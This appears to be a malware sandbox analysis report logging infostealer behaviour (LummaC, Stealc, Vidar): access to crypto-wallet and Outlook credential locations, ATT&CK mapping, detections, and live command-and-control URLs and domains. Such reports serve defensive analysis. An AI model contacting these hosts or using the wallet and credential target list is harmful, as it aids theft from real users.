Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC

Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: Process Memory Space: ea17d0b77a.exe PID: 3920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9434b989db.exe PID: 7128, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: Process Memory Space: ea17d0b77a.exe PID: 3920, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000030.00000003.3334314821.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.4222202528.0000000000F21000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.4214117571.000000000075E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9434b989db.exe PID: 7128, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 9434b989db.exe PID: 7128, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	2 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	LSASS Memory	24 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	11 Scheduled Task/Job	212 Process Injection	31 Obfuscated Files or Information	Security Account Manager	249 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	121 Software Packing	NTDS	971 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	361 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	361 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	11 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	50%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	100%	Avira	HEUR/AGEN.1352802
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	100%	Avira	HEUR/AGEN.1352802
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Avira	HEUR/AGEN.1320706
C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	100%	Avira	HEUR/AGEN.1320706
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	50%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\main\7z.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\main\7z.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	70%	ReversingLabs	Win64.Trojan.Nekark
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	70%	ReversingLabs	Win64.Trojan.Nekark

Name	Malicious	Reputation
aspecteirs.lat	false	high
sweepyribs.lat	false	high
sustainskelet.lat	false	high
rapeflowwj.lat	false	high
energyaffai.lat	false	high
grannyejh.lat	false	high
necklacebudi.lat	false	high
crosshuaht.lat	false	high
http://185.215.113.206/c4becf79229cb002.php	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll	9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.156.73.23/add?substr=mixtwo&s=three&sub=empNK	d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://duckduckgo.com/chrome_newtab	ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.206/	9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	c359af6492.exe.14.dr	false	high
https://discokeyus.lat/P	ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000599A000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://discokeyus.lat/apiqqqqqq	ea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://185.156.73.23/dll/download)%N	d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.16/off/def.exeJ	ea17d0b77a.exe, 0000002F.00000003.3627075029.0000000001108000.00000004.00000020.00020000.00000000.sdmp	false	high
https://curl.se/docs/hsts.html	352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	false	high
http://185.215.113.206/68b591d6548ec281/freebl3.dll	9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.206ta	9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp	false	high
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	c359af6492.exe.14.dr	false	high
http://185.156.73.23/files/download.hi	d5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.206/dq	9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	false	high
http://185.215.113.206/c4becf79229cb002.phpecee80c0ba92f6f38a0bad9769dfExtension	9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmp	false	unknown
http://185.156.73.23/soft/downloadI$.	d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crl.rootca1.amazontrust.com/rootca1.crl0	ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ocsp.rootca1.amazontrust.com0:	ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	false	high
